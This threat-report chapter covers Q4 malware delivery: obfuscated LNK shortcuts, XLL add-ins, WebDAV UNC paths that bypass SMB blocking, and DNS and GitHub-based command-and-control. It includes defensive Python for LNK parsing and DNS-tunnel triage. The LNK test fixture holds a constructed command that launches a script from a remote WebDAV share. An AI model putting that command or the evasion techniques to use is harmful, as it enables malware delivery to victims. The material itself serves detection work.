Chapter 4: Complex Delivery Chains: The Evolving Tactics of Malware and Phishing Threats

 

In Q4, attackers continued to use LNK files as the first stage of email-based attacks, increasingly obfuscating the shortcut's target path and arguments so that the executable it actually launches is harder to recover during analysis. At the same time, supply chain attacks aimed at IT professionals and business servers gained prominence, including campaigns that used malicious GitHub Gists to lure developers into installing malicious extensions.

 

[Figure: complex delivery chains]

 

Beyond the Inbox: New Attack Vectors for Adversaries

Expanding beyond conventional email, adversaries explored new attack vectors, delivering their lures through communication platforms such as Microsoft Teams, Skype, and Facebook Messenger.

A second notable trend was the growing use of Microsoft Excel Add-Ins (XLL). An XLL carries the Excel icon and opens in Excel like a workbook, but it is a native DLL that Excel loads and whose xlAutoOpen export it calls, so opening one runs attacker-controlled machine code rather than a macro. Excel's add-in security prompt and the Mark of the Web (which current Microsoft 365 builds use to block XLL files downloaded from the internet) are the controls that stand between the lure and execution.

 

The Surge in UNC/MUP Paths in Malicious LNK Files

A noteworthy shift was the heightened use of UNC paths in LNK files, which are resolved by the Multiple UNC Provider (MUP). MUP is the Windows kernel component that routes a UNC path (\\server\share\...) to the network redirector able to serve it: the SMB client (LanmanWorkstation), the WebDAV client (WebClient) and the Remote Desktop drive redirector (RDPNP) each register with it as a provider. When a path is not already in MUP's prefix cache, Windows offers it to the registered providers in the order listed under HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order (by default RDPNP, LanmanWorkstation, webclient) until one claims it. A shortcut that points at \\host@SSL@443\DavWWWRoot\... is therefore served over HTTPS by the WebClient service, so the payload is fetched from the internet even where outbound SMB is blocked at the perimeter.

This behaviour complicates automated analysis: a sandbox that resolves the target sees a chain of provider probes across several protocols (SMB, then WebDAV) rather than one simple file fetch, and a detection that only watches for outbound SMB misses the WebDAV retrieval entirely. Analysts should extract the shortcut's target path and argument strings statically and treat any UNC path, particularly one using the @SSL@port WebDAV syntax, as a download indicator.
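As an added example (not code from the original report), the following Python script parses the StringData fields of a Shell Link file as laid out in MS-SHLLINK and flags UNC paths in them, distinguishing the WebClient @SSL@port syntax that MUP routes to WebDAV. The two .lnk samples are constructed inline by the included build_lnk helper; the host 203.0.113.10, the invoice.cmd name and the field names in the result dictionary are assumptions for illustration. The script generalises beyond the report's case by also handling non-Unicode string data and by skipping LinkTargetIDList and LinkInfo blocks when present.

```python
"""Extract StringData from a Windows Shell Link (.lnk) and flag UNC/WebDAV paths.

Layout per MS-SHLLINK: ShellLinkHeader, optional LinkTargetIDList,
optional LinkInfo, then the StringData fields in a fixed order.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

# StringData fields, in the order they appear on disk
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]

# \\host\share\... including the WebClient form \\host@SSL@443\DavWWWRoot\...
UNC_RE = re.compile(r'\\\\[^\\\s"\']+\\[^\s"\']*')


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk (None where a field is absent)."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize + IDList, skipped whole
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    out = {"flags": flags}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            out[field] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {field}")
        pos += nbytes
        out[field] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return out


def find_unc_paths(parsed: dict) -> list:
    """Flag UNC paths in any StringData field and note WebClient (WebDAV) syntax."""
    hits = []
    for field, _ in STRING_FIELDS:
        for path in UNC_RE.findall(parsed.get(field) or ""):
            host = path[2:].split("\\", 1)[0]
            hits.append({"field": field, "path": path, "host": host,
                         "webdav_syntax": "@" in host or "davwwwroot" in path.lower()})
    return hits


def build_lnk(relative_path=None, arguments=None, icon_location=None) -> bytes:
    """Constructed test fixture: minimal Unicode .lnk with an empty IDList, no LinkInfo."""
    flags = IS_UNICODE | HAS_LINK_TARGET_ID_LIST
    body = struct.pack("<H", 2) + b"\x00\x00"   # IDListSize=2, TerminalID only
    for bit, value in ((HAS_RELATIVE_PATH, relative_path), (HAS_ARGUMENTS, arguments),
                       (HAS_ICON_LOCATION, icon_location)):
        if value is not None:
            flags |= bit
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIqqqIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + body


# Constructed samples, not real malware: a lure that starts a script from an HTTPS
# WebDAV share (served by the WebClient provider, not SMB), and a benign shortcut.
# 203.0.113.10 is a documentation address.
MALICIOUS_SAMPLE = build_lnk(
    relative_path="..\\..\\Windows\\System32\\cmd.exe",
    arguments='/c start "" \\\\203.0.113.10@SSL@443\\DavWWWRoot\\docs\\invoice.cmd',
    icon_location="%SystemRoot%\\System32\\shell32.dll",
)
BENIGN_SAMPLE = build_lnk(relative_path="..\\..\\Windows\\System32\\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, find_unc_paths(parse_lnk(blob)))
```

Run against a real shortcut with `find_unc_paths(parse_lnk(open("lure.lnk", "rb").read()))`. The parser deliberately reads only the string fields; a LinkInfo block can also carry a network share in its CommonNetworkRelativeLink, so a production extractor should parse that structure as well rather than skipping it.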

 

Innovations in Command and Control (C2)

Malware authors showed inventiveness in their Command and Control (C2) implementations. DNS-based C2 saw a resurgence: because DNS resolution is permitted almost everywhere and usually passes through the organisation's own resolvers, encoding commands and exfiltrated data into query names and TXT responses is harder to detect and block than a direct HTTP connection to an attacker server.
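As an added example (not from the report), the following Python triage heuristic scores a DNS query log for the shape that DNS C2 leaves behind: many unique, long, high-entropy subdomains from one client under one registrable domain, frequently as TXT queries. The log lines are constructed inline (client 10.0.0.7 beaconing to updates.example.net is made up); the thresholds, the log format and the two-label registered-domain cut are assumptions to tune per environment.

```python
"""Heuristic DNS-tunnel / DNS-C2 triage over a query log of (client, qname, qtype)."""
import hashlib
import math
from collections import Counter, defaultdict

# Constructed log (no real incident): "<timestamp> <client> <qname> <qtype>".
# Client 10.0.0.7 issues many unique, high-entropy subdomains under one zone,
# the pattern a DNS-based C2 channel produces when it encodes data into labels.
_normal = [
    "2023-11-02T10:00:01Z 10.0.0.5 www.example.com A",
    "2023-11-02T10:00:02Z 10.0.0.5 mail.example.com MX",
    "2023-11-02T10:00:05Z 10.0.0.5 cdn.example.com A",
    "2023-11-02T10:00:09Z 10.0.0.5 www.example.com A",
]
_beacons = [
    f"2023-11-02T10:01:{i:02d}Z 10.0.0.7 "
    f"{hashlib.sha256(f'chunk{i}'.encode()).hexdigest()[:48]}.{i:04x}.updates.example.net TXT"
    for i in range(12)
]
SAMPLE_LOG = _normal + _beacons


def shannon_entropy(s: str) -> float:
    """Bits per character; ~4.0 for random hex, ~5.2 for random base64."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def registered_domain(qname: str) -> str:
    # Assumption: the last two labels are the registrable domain. Real deployments
    # must use the Public Suffix List here (co.uk, github.io, ...).
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def parse_line(line: str) -> dict:
    ts, client, qname, qtype = line.split()
    return {"ts": ts, "client": client, "qname": qname.rstrip(".").lower(), "qtype": qtype.upper()}


def score_dns_log(lines, min_unique=8, min_entropy=3.0, min_label_len=20):
    """Group queries per (client, registered domain) and flag tunnel-like groups."""
    groups = defaultdict(lambda: {"subs": set(), "label_lens": [], "entropies": [],
                                  "txt": 0, "total": 0})
    for line in lines:
        rec = parse_line(line)
        dom = registered_domain(rec["qname"])
        sub = rec["qname"][: -len(dom) - 1] if rec["qname"] != dom else ""
        g = groups[(rec["client"], dom)]
        g["total"] += 1
        if rec["qtype"] in ("TXT", "NULL", "CNAME"):   # record types with roomy answers
            g["txt"] += 1
        if sub:
            first = sub.split(".")[0]                   # leftmost label carries the payload
            g["subs"].add(sub)
            g["label_lens"].append(len(first))
            g["entropies"].append(shannon_entropy(first))
    findings = []
    for (client, dom), g in groups.items():
        if len(g["subs"]) < min_unique:
            continue
        mean_len = sum(g["label_lens"]) / len(g["label_lens"])
        mean_ent = sum(g["entropies"]) / len(g["entropies"])
        if mean_len >= min_label_len and mean_ent >= min_entropy:
            findings.append({"client": client, "domain": dom,
                             "unique_subdomains": len(g["subs"]),
                             "mean_label_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2),
                             "txt_ratio": round(g["txt"] / g["total"], 2)})
    return findings


if __name__ == "__main__":
    for finding in score_dns_log(SAMPLE_LOG):
        print(finding)
```

The heuristic is a triage filter, not a verdict: CDNs, anti-virus lookup services and some telemetry agents legitimately produce long, varied subdomains, so findings should be enriched with the domain's age and reputation before escalation, and the per-client grouping matters because a resolver that aggregates a whole site will otherwise blur the signal.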

Notably inventive was a case in which a malware author experimented with GitHub commit messages as a channel for relaying executable code to infected devices. The twist exploits the ubiquity and reputation of popular development platforms: traffic to github.com rarely stands out in proxy logs, and the commits can be rewritten at will to update the payload.